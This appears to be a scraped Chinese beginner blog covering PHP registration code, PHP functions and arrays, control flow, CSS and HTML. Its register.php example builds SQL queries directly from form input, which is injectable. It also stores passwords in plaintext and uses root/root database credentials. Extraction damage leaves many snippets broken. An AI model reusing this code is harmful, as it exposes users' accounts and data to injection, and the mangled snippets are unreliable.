5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

<html>
<head>
<meta charset="utf-8" />
<title>注册页面title>
<style type="text/css">
form { 
text-align: center; 
} 
style>
head>
<body>
<form method="post" action="register.php">
　　用户名：<input type="text" name='username' maxlength="20"/><br />
请设置密码：<input type="password" name='password1' maxlength="18"/><br />
请确认密码：<input type="password" name='password2' maxlength="18"/><br /><br />
<input type="submit" value="立即注册" name="submit" style="margin-left:99px; margin-right:0px;padding-left:60px;padding-right:57px;"/> 
form>
body>
html>
register.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 
header('content-type:text/html;charset=utf-8');
error_reporting(E_ALL ^ E_NOTICE);
if ( ( $_POST['username'] != null ) && ( $_POST['password1'] != null ) && ( $_POST['password2'] != null )){
$userName = $_POST['username'];
$password1 = $_POST['password1'];
$password2 = $_POST['password2'];
$con = mysqli_connect("localhost","root","root");
mysqli_select_db($con,"ymh");
$sql1 = "select * from user where username = '{$userName}' ";
$res = mysqli_query($con,$sql1);
$row = mysqli_num_rows($res);
if($row>0){
echo"";
exit;
}else{
if($password1!==$password2){
echo"";
}else{
$sql2="insert into user(username,password) values ('$userName','$password1')";
if(mysqli_query($con,$sql2)){
echo"";
}else{
echo"";
}
}
}
}else{
echo"";
}
?>
welcome.html
1
2
3
4
5
6
7
8
9
<html>
<head>
<meta charset="UTF-8"> 
<title>欢迎登陆title> 
head>
<body>
<p>Hello Worldp>
body>
html>



PHP函数、数组和字符串处理
2019-04-11T08:15:51.000Z
1.函数（一）：自定义函数

1）基本格式：
function 函数名（参数1，…，参数n[可以省略]）{
        函数体；//任何有效的PHP代码
        return 值；//也可以不返回值
    }
    函数名（）；//函数的调用，函数名与上面一致
2）参数：
    分为形式参数和实际参数，形式参数由零个、一个或多个变量组成，实际参数由零个、一个或多个参数组成，每个参数是一个表达式用逗号隔开。例：
1
2
3
4
5
6
7
8
9

function add($a,$b){//形式参数，没有具体的值。
    echo $a+$b;
}
add(10,20);//实际参数，输出30。
echo '
';
$i=100;
add($i,20);//输出120
?>//实际参数和形式参数要一一对应。
3）返回值：如果不写则函数默认返回值为null，例：
1
2
3
4
5
6
7
8

function add($a,$b){
    return $a+$b;//返回值给调用的地方，结束函数运行
}
var_dump(add(10,20));//输出int 30。
$i=add(10,20);
echo $i;
?>//输出30
2.函数（二）：PHP变量范围

1）局部变量：在函数内定义，作用仅限于函数内部。
function test（）{
    $a=1；//局部变量，仅在这个函数内部有效
    }
    echo $a；//错误，无输出。
2）全局变量：在函数外定义，作用域从变量定义到本程序结尾，在PHP函数中无法直接使用，需用global声明变量。
 $i=10；//全局变量
    define（’MY_NAME’，’袁’）；
    function test（）{
    echo MY_NAME；
    global $i；
    echo $i；
    }
    test（）；//输出袁、10。
3）静态变量：在函数内部定义变量时候使用static定义变量，静态变量仅在第一次执行函数的时候会初始化值。
function test（）{
        static $a=10；//静态变量，初始化静态变量，仅在第一次使用执行。
        echo ++$a；
    }
    test（）；//输出11
    echo ’< br>’；
    test（）；//输出12
    echo’< br>’；
    test（）；//输出13
3.函数（三）：参数传递，可变函数

1）函数的传递
按值传递参数（默认方式）：对形式参数的操作，不会影响到实际参数（变量）的值，两者没有联系。例：
1
2
3
4
5
6
7
8

function test($a){
echo ++$a;
}
$i=10;
test($i);
echo '
'.$i;
?>//输出11、10
按引用传递参数：相当于形式参数和实际参数指的是同一个人，只是名字不一样，对于形式参数的操作会直接影响到实际参数（变量）。
1
2
3
4
5
6
7
8

function test(&$a){
echo ++$a;
}
$i=10;
test($i);
echo '
'.$i;
?>//输出11、11
函数的默认参数：可以给形式参数设置默认值，设置方法直接赋值即可。给形式参数加默认值时是从右往左加的，右边的必须有，才能给左边加。
1
2
3
4
5
6

function test($a=10,$b=20){
echo $a+$b;
}
test(20,20);
?>//输出40
可变长度参数列表：PHP有提供给我们的函数，可直接使用。func_get_args()；func_get_arg()；func_num_args()；这三个函数可以使用在我们的自定义函数内部，返回一些关于参数的信息。
1
2
3
4
5
6
7
8

function test(){
    var_dump(func_get_args());//返回一个数组类型，将实参列举出来
    var_dump(func_get_arg(3));//传入一个值表示获取第几个实参（从0开始）
    var_dump(func_num_args());//返回传入所在自定义函数的参数个数
}
test(12,9,'wasd','袁');
?>
2）可变函数（变量函数）
可变函数不能用于例如 echo，print，unset()，isset()，empty()，include，require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。
1
2
3
4
5
6
7

function test(){
    echo '我是test函数';
}
$a='test';//把函数名赋值给变量
$a();//相当于test();
?>
4.函数（四）：递归函数和内部（内置）函数

1）递归函数
递归函数即在函数内部自己调用自己的函数，函数在被调用的执行过程中会在内存里面分配空间用于存储临时数据，那么函数在执行过程中默认之间是没有联系的（除了静态变量、按引用传、全局变量），里面的变量默认都是局部变量，相互之间没有影响！递归函数，在函数的内部需要有适时结束函数运行的条件！
1
2
3
4
5
6
7
8
9
10
11
12

function test($n){
    echo $n.' ';
    if($n>0){
        test($n-1);//自己内部调用自己，即递归函数
    }else{
        echo'<-->';
    }
    echo $n.' ';
}
test(3);
?>//输出3 2 1 0 <--> 0 1 2 3
2）内部（置）函数
PHP提供给我们许多现成的函数或者结构，比如：echo（）、include（）、include_once（）、require（）、require_once（），上面这些可以省略括号，严格意义上不是函数，所以这些不能赋值给另外的变量。还有一些函数需要开启特定的PHP扩展模块，否则在使用的时候会出现“未定义函数”的错误。只需要记一些常用的内部函数和扩展函数，其他有需要再去找对应函数。
5.数组（一）：理解数组和创建数组

1）数组分类：
索引数组：索引值（相当于给里面的每一个数据起个名字）为整数的数组。
关联数组：索引值为字符串的数组，使用字符串作为索引。
2）数组创建：PHP数组与其他编程语言不同的是PHP不需要在创建数组时，指定数组大小甚至不需要在使用数组之前声明，也可以在同一个数组中存储任何类型的数据。
（1）$student[索引值]=具体的值；
如果省略索引值那么默认索引值就是整数，并且从0开始，依次递增。如：$student[0]=10；$student[1]=’袁’；…相当于$student[ ]=10；$student[ ]=’袁’；使用printf_r（$student）；输出。
（2）$student=array（索引值=>具体值，……）；
例：$student1=array（
            0=>10，
            1=>’袁1’，
            2=>true，
            3=>60.5
        ）；//索引数组
或$student2=array（
            ‘num’=>10，
            ‘name’=>’袁2’，
            ‘sex’=>true，
            ‘grade’=>60.5
        ）；//关联数组
        或$student3=array（
            0=>array(1,’小明’,true,70.5)，
            1=>array(2,’小强’,true,75.5)，
            2=>array(3,’小红’,false,80.5)
        ）；//二维数组
多维数组访问数值方法：变量名称[索引值][索引值]
6.数组（二）：遍历数组

1）for循环：用得少只能用于索引数组。
2）foreach语句实现遍历数组目的，格式：
foreach（数组变量 as 变量1=>变量2）{
        每次循环执行的语句
        变量1代表当前正在访问的数据的索引值
        变量2代表当前正在访问的数据
    }
实例：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

$student=array(
array('小明',1,true,60.5),
array('小强',2,true,70.5),
array('小红',3,false,80.5)
);
echo '';
foreach($student as $val){
    if($val[2]===true){
        $val[2]='男';
    }else{
        $val[2]='女';
    }
    echo "";
};
echo '{$val[0]} {$val[1]} {$val[2]} {$val[3]}
';
?>
7.数组（三）：预定义超全局数组

预定义数组变量：已经定义好（存在）的变量（存放的数据的类型是数组）。超全局变量
传递（提交）数据给服务器的两种方式：
get方式：格式：url地址？参数名=参数值&参数名=参数值……，在服务器端（请求的php文件这边）可以通过$_GET来获取到，$_GET索引值为参数名，索引值对应的数据就是参数值。
post方式：比如表单、post发送过来的。可以通过$_POST来获取到。例：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

$_POST;
?>

<html>
<head>
<meta charset="utf-8" />
<title>预定义超全局变量title>
head>
<body>
<form method="post">
姓名：<input type="text" name='username' /><br />
性别：<input type="text" name='sex' /><br />
<input type="submit" value='提交' />
form>
body>
html>
8.数组（四）：处理数组的相关函数

数组函数 部分函数举例：
1）array_count_values（）：用于统计数组中所有值出现的次数。        
1
$array = array(1, "hello", 1, "world", "hello")；$arr=array_count_values($array)；//函数返回数组类型的数据print_r($array);
2）array_key_exists（）：检查指定的键名是否存在于数组中。        
1
2
$search_array = array('first' => 1, 'second' => 4);
var_dump(array_key_exists('second',$search_array));
3）array_search（）：搜索数组中给定的值并返回键名。        
1
2
$array = array(0 => 'blue', 1 => 'red', 2 => 'green', 3 => 'red',4=>15);
var_dump(array_search('15', $array,true));
4）count（）：返回数组中元素的数目。         
1
2
$array = array(0 => 'blue', 1 => 'red', 2 => 'green', 3 =>   'red',4=>15);
var_dump(count($array));
5）in_array（）：检查数组中是否存在指定的值。        
1
2
$os = array("Mac", "NT", "Irix", "Linux");
var_dump(in_array('Mac', $os));
6）list（）：把数组中的值赋给一些变量。        
1
2
3
$arr=array(60,80,100);
list($xiaoqiang,$xiaohong,$xiaoming)=array(60,80,100);
echo $xiaoqiang;
7）asort
（）：对关联数组按照键值进行升序排序。        
1
2
3
4
5
6
7
8
$students=array(
'xiaoming'=>60,
'xiaohong'=>80,
'xiaoqiang'=>100,
'xiaowang'=>90
);
asort($students);
print_r($students);
直接对数组里面的数据进行排序，第二个参数
SORT_REGULAR - 正常比较单元（不改变类型） 
SORT_NUMERIC - 单元被作为数字来比较 
SORT_STRING - 单元被作为字符串来比较
SORT_LOCALE_STRING - 根据当前的区域（locale）设置来把单元当作字符串比较。
8）array_filter（）：用回调函数过滤数组中的元素。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
function odd($var)
{
return($var % 2 == 1);
}
function even($var)
{
return($var % 2 == 0);
}
$array1 = array("a"=>1, "b"=>2, "c"=>3, "d"=>4, "e"=>5);
$array2 = array(6, 7, 8, 9, 10, 11, 12);
echo "Odd :\n";
print_r(array_filter($array1, "odd"));
echo "Even:\n";
print_r(array_filter($array2, "even"));
9.字符串处理

字符串函数 部分函数举例：
1）去除空白或其他字符函数
trim（）：移除字符串两侧的空白字符和其他字符。        
1
2
3
$str='    abc   ';
var_dump($str);
var_dump(trim($str));
1
2
3
$str='abcabcdefac';
var_dump($str);
var_dump(trim($str,'bac'));//如果要去除多个字符可以连着写！
另外：ltrim（）函数可以移除字符串左侧的空白字符或其他字符，rtrim（）函数可以移除字符串右侧的空白字符或其他字符，用法和trim相同。
2）大小写转换函数
strtoupper：把字符串转换为大写字母。strtolower：把字符串转换为小写字母。
例：echo strtoupper（”Hello WoRLD!”）；
3）字符串查找函数
substr_count
（）：计算子串在字符串中出现的次数。        
1
2
3
4
5
6
$str='testteste';
var_dump(substr_count($str,'te'));
$text2 = 'gcdgcdgcd';
echo substr_count($text2, 'gcdgcd');
$str='testteste';
var_dump(substr_count($str,'te',1,8));//不能超出字符串
strpos（）：返回字符串在另一字符串中第一次出现的位置（对大小写敏感）。    
1
2
3
4
5
6
7
8
9
$str='testteste';
var_dump(strpos($str,'t1'));
if(strpos($str, 't')===false){
echo '没找到！';
}else{
echo '找到啦!';
}
$str='testteste';
var_dump(strpos($str,'t',1));
strstr（）：查找字符串在另一字符串中的第一次出现（对大小写敏感）。     
1
2
3
4
$str='testteste';
var_dump($str);
var_dump(strstr($str,'s'));
var_dump(strstr($str,'s',true));
4）字符串替换函数
str_replace（）：替换字符串中的一些字符（对大小写敏感）。
1
2
3
4
5
6
7
8
9
10
$str=array(
'abc123abc',
'123abcabc',
'abcab123c'
);
var_dump($str);
echo '
';
$str1=str_replace(array('1','2','3'),array('一','二','三'),$str,$count);
echo $count.'
';
var_dump($str1);
5）与html标签相关的函数
htmlspecialchars（）：把一些预定义的字符转换为 HTML 实体。
1
2
3
4
5
6
$str=<<
嘻嘻嘻
START;
echo $str;
echo "\n";
echo htmlspecialchars($str);
strip_tags（）：剥去字符串中的 HTML 和 PHP 标签。        
1
2
3
4
5
6
7
$str=<<
嘻嘻嘻
流年、乱了浮生
START;
echo $str;
echo "\n";
echo strip_tags($str,"");
6）字符串截取函数
substr（）：返回字符串的一部分。        
1
2
3
4
$str='testdqwdwqdwqdqdwq';
echo substr($str,3,2);
$str='test';
echo substr($str,-3,2);
7）字符串分隔函数
explode（）：把字符串打散为数组。        
1
2
$str='test,test1,test2,test3';
var_dump(explode(',',$str,2));
str_split（）：把字符串分割到数组中。
$str=’test’;
var_dump(str_split($str,3));


PHP基本语法与流程控制
2019-04-05T01:47:55.000Z
1.PHP概述

PHP语法借鉴吸收了C语言、java和Perl等流行计算机语言的特点。PHP主要目标是允许网络开发人员快速编写动态页面，简单说PHP主要用于开发各种类型的网站程序。PHP是脚本语言不需要事先编译，在服务器端运行。PHP可以运行在windows、Linux等各种操作系统上。
2.PHP基本语法（一）：初识PHP脚本程序

PHP语言标记：开始标记：< ?php      结束标记：?>       输出：echo 
PHP代码可以嵌入到html代码中任何位置，并且可以嵌入任意多个，代码末尾的?>结束标记可以省略。一些PHP语句的结尾要加上；表示一句话的结束，结束标记?>就隐含了一个；所以在?>之前紧挨着的PHP语句可以省略；。
注释：/*   */多行注释        //单行注释
空格、制表符、换行这些在PHP中不会显示，可适当利用增加代码可读性。
3.PHP基本语法（二）：变量、变量类型和常量

1）变量：是用于临时储存值的容器，PHP在使用变量前不需要事先声明变量，一旦设置了某个变量，就可以在脚本中重复去使用它。
格式：$变量名=值    unset（变量名称）函数 释放（删除）指定的变量
变量的命名规则：变量名严格区分大小写，变量名只能包含字母、数字、下划线并且必须以字母或下划线开头，最好不要用关键字（如：if、and等）作为变量名称。
变量的引用赋值：例：
1
2
$；a=10；$b=$a；echo $b；//此时输出:10
$；a=10；$b=&$a；$b=20；echo $a；//此时输出:20
2）变量类型：是指保存在该变量中的数据类型，具有相同类型的数据才能被彼此相互操作，也不需要事先声明，变量或常量的数据类型由程序的上下文决定
使用var_dump（变量名）可以输出变量的类型。
（1）bool（布尔型）：最简单的类型，变量里存ture和false，如：$a=true;
（2）int（整型）：变量里存整数，如：$a=1;
（3）float（浮点型，也称double）：变量里存小数，如：$a=1.1;
（4）string（字符型）：如：$a=’测试’，字符串可以用单引号、双引号、定界符三种方法来定义
单引号：单引号中的字符串中不能再包含字符串，如果要用单引号需要用反斜杠（\）转义。PHP不会解析单引号中的变量，所以在定义简单字符串没有特别要求的时候，应使用单引号定义字符串！
双引号：PHP会解析双引号中的变量名，在双引号中使用变量时需使用{}括起来如:$a=”abc{$b}text….”，不括起来解析变量时会从$开始一直往后读，就会导致报错。
定界符：<<<之后跟一个标识符（自己命名，命名规则同变量命名规则）开始，然后是字符串内容，最后是同样的标识符表示结束，结束标识符后必须接；例：
1
2
3
$a=<<
t{$b}est123...
abc;
定界符中写入变量时与双引号情况相同，定界符中字符串中可以使用单引号、双引号。
（5）array（数组）（6）object（对象）（7）resource（资源）这三种暂时先不写，之后再写。
（8）NULL（空）：将变量直接赋值为null；声明的变量未被赋值；被unset（）函数删除的变量，这三种情况就是空类型。
3）变量类型相互转换
自动类型转换：这种是程序运行中不太可控的部分所以在编写代码是不要涉及，不能给自己挖坑是吧。
强制类型转换：在要转换的变量之前加上括号括起来目标类型如：$b=（int）\$a;这种也用的少尽量不用
4）常量
定义：define（’常量名’，值）或者define（”常量名”，值） 
命名：规则和变量相同，也遵循PHP标识的名称规则，按照惯例常量标识符总是大写的，例：define（’TEST’，’测试’），自己定义的常量严格区分大小写。
特点：常量不能通过赋值语句定义，只能用define（）函数定义； 常量一旦被定义就不能被重新定义或者取消定义；常量的值只能是bool、int、float、string类型。
预定义常量：其中有些以_开头的，这些预定义常量又叫魔术常量，预定义常量不区分大小写。
4.PHP基本语法（三）：运算符

定义：运算符就是对一个或多个操作数（变量或数值）执行某种运算的符号，也称操作符。例：！true、$a + $b、true ？ 1:0，其中！、+、？、：这些就是运算符，其他就叫操作数，根据操作数的个数分为一元运算符、二元运算符、三元运算符。
1）算术运算符
    +：加法；-：取反或减法；*：乘法；/：除法；%：取模
    ++：自增：++$a 先加一再赋值，$a++ 先赋值再加一；–：自减：和++相同，自增自减    是对变量而言的。
2）字符串运算符：只有一个（.）链接运算符，将两个字符串连接起来，例：$a.$b；
3）赋值运算符（=）：=左边必须是变量，右边可以是一个表达式，也可以是值或一个变量，将右边的值赋给左边的变量。
其他形式：+=：例：$a+=$b，等同于（$a=$a+$b）， -=、/=、*=、%=     同理。
4）比较运算符：对操作数按照比较运算符的规则进行比较，比较出的结果如果满足规则结果就是true，否则就是false。
==：是否相等；===：全等（值相等类型也相等）；！=：是否不相等；<>：同！=
！==：不全等；   <：小于；   >：大于；   <=：小于等于；   >=：大于等于
5）逻辑运算符：与比较运算符相似，满足结果输出true，否则输出false。
逻辑与（and 或 &&）：左右两边表达式值都为true时输出true，否则输出false。
逻辑或（or 或  ||）：左右两边表达式值一个为true，就输出true。
逻辑亦或（xor）：左右不一样输出true，一样输出false。
逻辑非（！）：否定当前值。
6）位运算符：主要用于网站开发，在PHP中用的很少，这里就不写了。
7）其他运算符
? :： 格式：表达式1？表达式2：表达式3；，如果表达式1的值为true就执行表达式2，表达式1的值为false就执行表达式3
‘  ’：可以把系统的命令放在里面执行，例：$a=’ipconfig’；，涉及跨平台。
@：屏蔽表达式可能发生的错误，例：echo @$a；
=>、->、instanceof 面向数组和对象使用，之后再写。
8）运算符的优先级：详情点这里 
优先级归纳：[结合方向（从哪个方向算）]运算符，由高到低（有括号先算括号内的，括号内看成一个整体）：
[无]递增++递减–、[右]逻辑非！、[左]乘* 除/ 取余%、[左]加 减 字符串连接符、[无]包含大于号或者小于号的比较运算符、[无]不包含大于号或者小于号的比较运算符、[左]逻辑与&&、[左]逻辑或||、[左]？：、[右]赋值运算符、[左]逻辑亦或xor
5.流程控制（一）：if语句

例：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

$a=91;
$grade1=60;
$grade2=75;
$grade3=85;
if($a<$grade1){
    echo'不及格';
}
elseif($a<$grade2){
    echo'及格';
}
elseif($a<$grade3){
echo'良好';
}
else{
    echo'优秀';
}
?>//最终输出优秀
if、elseif、else等可相互嵌套，可以根据实际情况改变灵活运用，比较简单敲几遍就会了，与C语言语法一样。
6.流程控制（二）：switch语句

例：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

$a=3;
switch($a){//括号内是表达式
    case 1://case相当于==，与括号内表达式的值比较
    echo'今天星期一';
    break;//跳出的意思，结束此次switch
    case 2:
    echo'今天星期二';
    break;
    case 2:
    echo'今天星期二';
    break;
    case 3:
    echo'今天星期三';
    break;
    case 4:
    echo'今天星期四';
    break;
    case 5:
    echo'今天星期五';
    break;
    case 6:
    echo'今天星期六';
    break;
    case 7:
    echo'今天星期日';
    break;
    default:
    echo'无法匹配';
}
?>//最终输出今天星期三
注：表达式的值最好是整型或者字符串；不能漏掉break；如果某个case语句后面没有接任何语句块，那么就说明这个语句块内容同下；case后面的语句块不需要用{}括起来。
7.流程控制（三）：循环语句

1）while循环：while（表达式）{各种语句……}，当表达式值为true执行大括号内语句块，语句块执行结束后返回上面继续判断表达式值是true还是false，按此循环，当值为false时while语句结束，例：
1
2
3
4
5
6
7

$a=1;
while($a<5){
    $a++;
    echo $a.'
';
}
?>//最终输出2、3、4、5
2）do…while循环：do{各种语句}while(表达式);，与while语句不同的是do…while语句至少要执行一次，例：
1
2
3
4
5
6
7

$a=1;
do{
    $a++;
    echo $a.'
';
}while($a<5);
?>//最终输出2、3、4、5
3）for循环 ：for(表达式1;表达式2;表达式3){各种语句}，表达式1放初始化语句如：$a=0，表达式2放判断语句，表达式3放对初始化自增或自减的语句，三个表达式位置可以放多个表达式中间用逗号隔开。例：
1
2
3
4
5

for($i=1;$i<5;$i++){
    echo $i.'
';
}
?>//最终输出1、2、3、4
8.流程控制（四）：特殊的流程控制语句

1）break语句：用于switch、for、while、do…while、foreach等语句，用于中断当前语句，例：
1
2
3
4
5
6
7
8

for($i=1;$i<5;$i++){
if($i==3){
        break;//中断本次循环
}
    echo $i.'
';
}
?>//最终输出1、2
2）continue语句：只用于循环语句，跳出本次循环，例：
1
2
3
4
5
6
7
8

for($i=1;$i<5;$i++){
if($i==3){
        continue;//跳出本次循环
}
    echo $i.'
';
}
?>//最终输出1、2、4
3）exit（）语句：结束整个程序的执行，括号内可以写字符串用作提示。例：
1
2
3
4
5
6
7
8

echo'星期一
';
exit('程序结束！');
echo'星期二
';
echo'星期三
';
echo'星期四
';
echo'星期五
';
?>//最终输出星期一、程序结束！



css知识总结
2019-03-30T09:05:48.000Z
1.CSS定义和三种引用方式
    
CSS全称为“层叠样式表 (Cascading Style Sheets)”，作用是为html元素去定义样式能够实现内容与表现相分离，提高代码的可重用性和可维护性。使用CSS样式的可以通过定义某个样式，使网页不同位置的文字有着统一的字体、字号或者颜色等。 一个完整的页面 = HTML + CSS，HTML显示页面内容，CSS构建HTML样式。
    CSS引用方式有三种：行内样式、内部样式表、外部样式表
    1）行内样式： 使用style属性在HTML元素中引入CSS样式（只能控制某一个元素的显示效果)
    例：< p  style=”font-size：10px；color：red；”> 
    2）内部样式表： 将样式放在< style>标签中，< style>标签写在< head>标签中    
    例：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<html>
<head>
  <meta charset="utf-8">
  <title>内部样式表title>
  <style>
    div{
        color: red;
        width: 500px;
        background: yellow;
    }
  style>
head>
<body>
<div>梨div>
body>
html>
3）外部样式表： 将CSS代码保存在以.css结尾的css样式文件中，再进行引用
    用法：在< head>中写以下代码：< link rel=”stylesheet” type=”text/css” href=”链接的css文件地址” />（这是一种常用的方式）
    例：
1
2
3
4
5
6
7
8
9
10
11



  
  外部样式表
  


梨


    特点：实现内容与表现相分离；将可重用性和可维护性体现的最完美(所有的页面都能用)；可以在整个网站乃至于互联网中做通用的样式定义。
    样式优先级：行内样式 > 内部样式表 > 外部样式表    
    内部样式表 或 外部样式表，级别处于中间位置；就近原则（谁靠下，以谁为主）。
2.CSS语法
 
基本语法： 样式声明：属性：值；   样式规则：选择器 和 样式声明
    特征：1）继承性：大部分的CSS样式属性，是可以被继承的。继承：子级不用单独定义样式，可以直接使用父级的东西。2）层叠性：为一个元素定义多个样式的时候，样式不冲突时，多个样式表中的样式可以层叠(合并)为一个。3）优先级：样式冲突时，按照不同样式规则的优先级来应用样式。
    rgb色彩模式：R  红色；G  绿色；B  蓝色    例：color： rgb（255，0，0）  或  rgb（100%，%0，%0）； 颜色单位：#rrggbb；每一位取0~9，例：#0123456
3.CSS选择器
    
1）通用选择器 作用：匹配页面中的任何一个元素 语法：* {样式规则}
    2）元素选择器 作用:匹配页面中的指定的元素； 语法：元素名称作为选择器，如： body、p等。
    3）类选择器  作用：定义公共的样式，由任意一个标签进行引用
        语法：.className{ ：； } 例：.red_back{ } .red_back{ }
        引用：在标签中，通过class属性 对类选择器名称进行引用
        注意：在一个元素中，可以同时对多个类选择器进行引用。多个类选择器之间用空格隔开。
    4）类选择器-分类选择器
        作用：将类选择器和元素选择器结合起来使用，从而实现对某种元素不同样式的细分控制
        语法：元素选择器 .className { } 例：div.red_back{ }
    5）id选择器
        作用：通过元素的id值，来声明定义元素的相关样式属性 语法：#idValue{ }
    6）群组选择器
        作用：选择器声明，是以 , 隔开的选择器列表
        语法：selector1，selector2，selector3，selector4…{ } 例：div，p，.redback{color：red；}
    7）后代、子代选择器
        只存在一级的父子关系：可以称之为子代或者后代
        多于一级的嵌套关系：只能称之为后代 后代语法：selector1 selector2{ }
        例：div span{ } / 匹配出所有div元素中的span元素 / #content .redBack{ }
        子代作用：只能匹配出父子关系的子级元素
        目的：不希望选择任意的后代元素，而是希望缩小范围，只选择某个具体的子元素时使用。 
        语法：selector1>selector2{ }
    8）伪类选择器作用：匹配元素的不同状态   语法：：作为开始的
        分类：
        链接伪类 作用：只匹配超链接的状态
        ：link：适用于尚未访问的超链接 ：visited：适用于访问过后的超链接
        动态伪类
        ：hover：适用于鼠标悬停在html元素上的状态
        ：active：适用于html元素被激活时
        ：focus：适用于html元素获取焦点时的状态
        此外还有目标伪类、元素状态伪类、结构伪类、否定伪类。详细的伪类选择器可以参考链接：https://blog.csdn.net/Panda_m/article/details/50084699
4.CSS背景
    
1）背景颜色：background-color：red（或颜色单位）；
    2）背景图片：例：background-image：url(“1.png”)；
    3）背景平铺：background-repeat：值
        取值：repeat ：即水平方向又垂直方向平铺(默认值)；no-repeat ： 没有平铺；repeat-x ：     仅水平方向平铺；repeat-y ：仅垂直方向平铺 
    4）背景固定：background-attachment：值
        默认情况，背景图片会随着滚动条而发生滚动，可以通过背景图片固定的方式解决此问题，    让背景图保持在网页的可视化窗口的某个固定为止处不随着滚动条发生位置变化。
        注意：尽量将背景图片加给body元素
        取值：scroll ：背景会随滚动条发生滚动（默认值）；fixed ：固定，背景不会随着内容而发    生滚动。
    5）背景定位：background-position：x值 y值；
        取值：x  y ：x水平偏移位置,值为正 向右移动，值为负，向左移动
        y垂直偏移位置，值为正 向下移动，值为负，向上移动
        x%  y% ： 左上角 ： 0% 0%； 右下角 ：100% 100%； 居中显示 ： 50% 50%
        关键字：x ：left，center，right ； y ： top，center，bottom
    6）背景属性：将以上几个属性全部综合到一起,通过一个属性描述所有的值
        属性:background：值；   取值：color  url()  repeat  attachment  position；例：backgroud：url（”1.png”） repeat-y；
5.CSS文本格式化
    
字体样式：例：font-family：”宋体”； 字体大小：font-size：16px（默认）；
    字体加粗：font-weight：bold；（相当于< b> ）；字体样式：font-style：italic；（斜体）
    字体属性：font：font-style font-variant font-weight font-size font-family；常用设置方式：font：12px “微软雅黑”；
    文本颜色：color：red； 
    字符间距：letter-spacing： 0px（默认）；空格距离：word-spacing：0px（默认）；
    文字线条修饰 属性：text-decoration：值；  取值：none 无线条、underline 下划线、overline 上划线、line-through 删除线
    文本对齐：text-align：left（默认）、 right 、center、justify（两边对齐）；
    文本缩进：text-indent 2px； 行高：line-height 3px；
    英文大小写：text-transform：uppercase（全大写）、lowercase（全小写）、capitalize（首字母大写）；
6.CSS链接和列表
    
1）链接
        a：link  初始状态；a：visited  已访问过；a：hover  鼠标放在链接上时；a：active  链接被    点击时
        注意：a：hover 必须跟在 a：link 和 a：visited后面，a：active 必须跟在 a：hover后面
        还可以添加状态例如：a：hover{  color：red； font-size：30px；} 
    2）列表
        列表项标志：list-style-type：值； 取值：none 无标记（常用）、disc 实心圆、circle 空心    圆、square 实心方块……
        列表项图像：list-style-image：值； 取值：url(图像路径)；功能：使用自定义图像，作为列    表项的显示标识
        列表项位置：list-style-position：值；取值：outside：列表项标识位于文本之外（默认）；     inside：列表项标识更改在文本范围之内
7.CSS盒子模型
    
外边框：border：5px solid（实线） black；
    内边距：padding：20px（上下） 50px（左右）；padding：20px 30px 40px 50px；（顺时针，上右下左）
    外边距：margin：30px；（与padding类似）
    另外单边设置：margin-top：上外边距 ； margin-right：右外边距margin-bottom：下外边距 ； margin-left：左外边距
    边框合并：border-collapse：值；取值：separate 分离边框（默认）、collapse 合并边框
    更详细盒子模型，可以参考链接：https://www.cnblogs.com/clearsky/p/5696286.html
8.CSS布局与定位
    
可以参考链接：https://blog.csdn.net/weixin_38902950/article/details/84674199
9.总结
    
CSS中选择器、盒模型、布局与定位是最重要的几部分，想深入了解可以多找几篇文章看看，本人是初学者所以这几部分就没有详细写。
本文参考的链接：https://www.cnblogs.com/wangdongdong1234/p/6394510.html
参考视频：https://www.bilibili.com/video/av26764447/?p=16


html 知识总结
2019-03-27T11:31:36.000Z
1.基本结构

< !DOCTYPE html>//声明文档的解析类型，必须写在第一行
< html>//根标签(开始)
< head>//头标签(开始)
< meta charset=”utf-8”>//声明为utf-8编码，避免出现乱码
< title>html+css//页面标题标签//头标签(结束)
< body>//主体标签(开始)< h1>我的标题//内容标题标签< p>我的段落。//段落标签
//主体标签(结束)
//根标签(结束)
注：:HTML中不支持 空格、回车、制表符，它们都会被解析成一个空白字符。
2.标签

1）标签写法要用小写字母，由尖括号包围，成对出现的标签称为双标签不能忘记结束标签。单独出现的标签叫单标签，最好也要闭合，形式为<标签名 />，例如< br />(换行标签)。< !DOCTYPE html>不是标签，只是声明。从开始标签到结束标签所有代码就是HTML的元素，之间的内容叫元素内容。没有内容的 HTML 元素被称为空元素，空元素是在开始标签中关闭的，例如< br />。
2）属性
  属性可以在元素中添加附加信息，属性一般描述于开始标签，属性总是以名称/值对的形式出现。例如< a herf=” http://www.baidu.com “> 百度一下< /a>，< a>为链接标签，herf是属性名称，双引号中是链接地址，称为属性值，属性和属性值，尽量小写，也可以自定义属性(不能使用中文)。
3）注释
  < !– 注释的内容 –>
4）水平线
  单标签：< hr />可连续使用多个。
5）标题
  是通过< h1>-< h6>标签进行定义的，< h1>定义最大的标题。< h6>定义最小的标题。浏览器会自动地在标题的前后添加空行。
6）段落
  通过< p>标签定义，浏览器会自动地在段落的前后添加空行，如果在不产生一个新段落的情况下进行换行，须使用< br />标签。
7）文本格式化(双标签)
  < b>定义粗体文字，< i>定义斜体字，< small>定义小号字，< big>定义大号字，< strong>定义加重语气。
8）链接
  使用< a>设置超文本链接，如< a href=” http://www.baidu.com “> 百度一下< /a>。
9）图像
  使用< img>标签，< img border=”边框属性” src=”图片路径” alt=”为图像定义一串预备的可替换的文本” width=”图像宽度” height=”图像高度” >
10）表格
  表格由 < table> 标签来定义。< tr>定义行，< td>定义表格数据，< th>定义表格表头，大多数浏览器会把表头显示为粗体居中的文本。写法：
< table border=”1”>
    < tr>
        < th>….
        < th>…..
    
    < tr>
        < td>…….
        < td>………
    
11）列表
  无序列表：< ul>< li>苹果< li>梨
  有序列表：< ol>< li>苹果< li>梨
12）表单
  使用< form>标签定义，输入标签为< input>，输入类型是由类型属性 type 定义的。例：
< form action=”表单数据发送的地址”>
User : < input type=”text” name=”user”>//文本域
Password: < input type=”password” name=”password”>//密码域
